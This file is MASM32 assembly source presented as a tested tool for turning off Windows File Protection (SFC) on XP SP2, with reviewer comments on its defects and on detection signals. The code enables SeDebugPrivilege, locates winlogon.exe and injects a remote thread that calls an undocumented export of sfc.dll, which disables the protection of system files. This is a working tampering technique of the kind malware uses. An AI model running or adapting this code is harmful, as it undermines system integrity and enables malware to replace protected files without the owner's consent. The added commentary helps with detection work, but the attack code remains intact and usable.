关闭SFC[文件保护]的源代码

WindowsXP Professional SP2测试通过.

.386
.Model Flat,StdCall
Option CaseMap :None

Include /Masm32/Include/Windows.inc
Include /Masm32/Include/User32.inc
Include /Masm32/Include/Shell32.inc
Include /Masm32/Include/Kernel32.inc
Include /Masm32/Include/Advapi32.inc

IncludeLib /Masm32/Lib/User32.lib
IncludeLib /Masm32/Lib/Shell32.lib
IncludeLib /Masm32/Lib/Kernel32.lib
IncludeLib /Masm32/Lib/Advapi32.lib

.Data
; Name of the process that CloseSFC searches for in the process snapshot;
; compared case-insensitively (lstrcmpi) against PROCESSENTRY32.szExeFile.
stProcess db "winlogon.exe",0

.Data?
; NOTE(review): hFile, dwProcessID, hProcess, lpLoadLibrary, lpDllName,
; szDllPath and szSysPath are declared here but not referenced by any code
; on this page; presumably left over from another variant of the tool.
hFile dd ?
dwProcessID dd ?
hProcess dd ?
lpLoadLibrary dd ?
lpDllName dd ?
szDllPath db 260 dup(?)
szSysPath db 260 dup(?)
; State used by EnableDebugPriv: the current process token, the
; TOKEN_PRIVILEGES structure passed to AdjustTokenPrivileges, and the LUID
; returned by LookupPrivilegeValue.
hToken dd ?
tkp TOKEN_PRIVILEGES<>
sdnv LUID <>

.Code
;-----------------------------------------------------------------------
; void EnableDebugPriv(void)
; Enables SeDebugPrivilege on the current process token so that the
; later OpenProcess in CloseSFC can target a system process.
; ABI:   stdcall, no parameters, no meaningful return value (eax holds
;        the result of the final CloseHandle).
; Clobb: eax, ecx, edx, flags; writes globals hToken, tkp, sdnv.
; Review notes:
;  - None of OpenProcessToken, LookupPrivilegeValue or
;    AdjustTokenPrivileges is checked. If OpenProcessToken fails, hToken
;    is uninitialised and every following call (including CloseHandle)
;    operates on garbage.
;  - AdjustTokenPrivileges reports success even when the privilege was
;    not actually granted (GetLastError() == ERROR_NOT_ALL_ASSIGNED), so
;    success here does not imply the privilege is held.
;  - CTEXT and m2m are MASM32 macro-library macros; no macro include is
;    visible among the Include lines above — TODO confirm the build
;    pulls it in.
;  - Defender note: enabling SeDebugPrivilege is a common precursor to
;    cross-process tampering and is visible in privilege-use auditing.
;-----------------------------------------------------------------------
EnableDebugPriv Proc
invoke GetCurrentProcess
; eax = pseudo-handle of the current process (never needs closing)
invoke OpenProcessToken,eax,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY,addr hToken
invoke LookupPrivilegeValue,0,CTEXT("SeDebugPrivilege"),addr sdnv
; Build a single-entry TOKEN_PRIVILEGES: LUID of SeDebugPrivilege, enabled.
mov tkp.PrivilegeCount,1
m2m tkp.Privileges.Luid.LowPart,sdnv.LowPart
m2m tkp.Privileges.Luid.HighPart,sdnv.HighPart
mov tkp.Privileges.Attributes,SE_PRIVILEGE_ENABLED
; No previous-state buffer is requested (last two args are 0).
invoke AdjustTokenPrivileges,hToken,FALSE,addr tkp,sizeof tkp,0,0
invoke CloseHandle,hToken
ret
EnableDebugPriv EndP

;-----------------------------------------------------------------------
; void CloseSFC(void)
; Walks a Toolhelp process snapshot looking for the first process whose
; image name matches stProcess ("winlogon.exe"), opens it, and starts a
; remote thread in it whose start routine is ordinal 2 of sfc.dll (the
; page does not name the export). Returns after the first match that
; reaches CreateRemoteThread, or after the snapshot is exhausted.
; ABI:   stdcall, no parameters; eax on return is the result of the last
;        CloseHandle and is ignored by the caller.
; Locals: @stProcess = PROCESSENTRY32 for the current entry,
;         @hSnapShot = snapshot handle, @hProcess = opened target handle,
;         @hSfc = local sfc.dll module handle.
; Review notes (defects, not fixed here):
;  - @hProcess is never closed on any path (handle leak).
;  - The `ret` inside the loop skips CloseHandle,@hSnapShot, so the
;    snapshot handle leaks on the success path.
;  - CreateToolhelp32Snapshot, OpenProcess and LoadLibrary results are
;    only partially checked; a failed LoadLibrary passes 0 into
;    GetProcAddress.
;  - The address resolved in this process is used as the start routine in
;    the target process; this presumes sfc.dll is mapped at the same base
;    there (plausible on the XP SP2 build noted at the top, which has no
;    ASLR) — TODO confirm.
;  - Defender note: OpenProcess on winlogon.exe with PROCESS_CREATE_THREAD
;    followed by CreateRemoteThread from a non-system process is a
;    high-signal event (e.g. Sysmon ProcessAccess / CreateRemoteThread
;    events); thread start addresses inside sfc.dll are a distinguishing
;    detail for detection content.
;-----------------------------------------------------------------------
CloseSFC Proc
Local @stProcess:PROCESSENTRY32
Local @hSnapShot
Local @hProcess
Local @hSfc

; PROCESSENTRY32.dwSize must be set before Process32First.
invoke RtlZeroMemory,addr @stProcess,sizeof @stProcess
mov @stProcess.dwSize,sizeof @stProcess
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov @hSnapShot,eax
invoke Process32First,@hSnapShot,addr @stProcess
; Loop invariant: eax = BOOL from the last Process32First/Next call.
.While eax
invoke lstrcmpi,addr @stProcess.szExeFile,addr stProcess
.if eax == 0
; Name matched: request only the rights needed for thread creation.
invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or PROCESS_VM_WRITE,FALSE,@stProcess.th32ProcessID
.if eax
mov @hProcess,eax
; Resolve ordinal 2 of sfc.dll locally, then drop the local reference.
; push/pop preserve the resolved address across FreeLibrary.
invoke LoadLibrary,CTEXT("sfc.dll")
mov @hSfc,eax
invoke GetProcAddress,eax,2
push eax
invoke FreeLibrary,@hSfc
pop eax
.if eax
invoke CreateRemoteThread,@hProcess,0,0,eax,0,0,0
.if eax
; Thread handle is closed immediately; @hProcess and @hSnapShot are not.
invoke CloseHandle,eax
ret
.endif
.endif
.endif
.endif
invoke Process32Next,@hSnapShot,addr @stProcess
.EndW
invoke CloseHandle,@hSnapShot
ret

CloseSFC EndP

; Program entry point: enable the debug privilege, attempt the injection,
; then exit. Neither procedure reports success, so the exit code is always
; 0 regardless of whether anything happened.
Start:
Call EnableDebugPriv
Call CloseSFC
invoke ExitProcess,0
End Start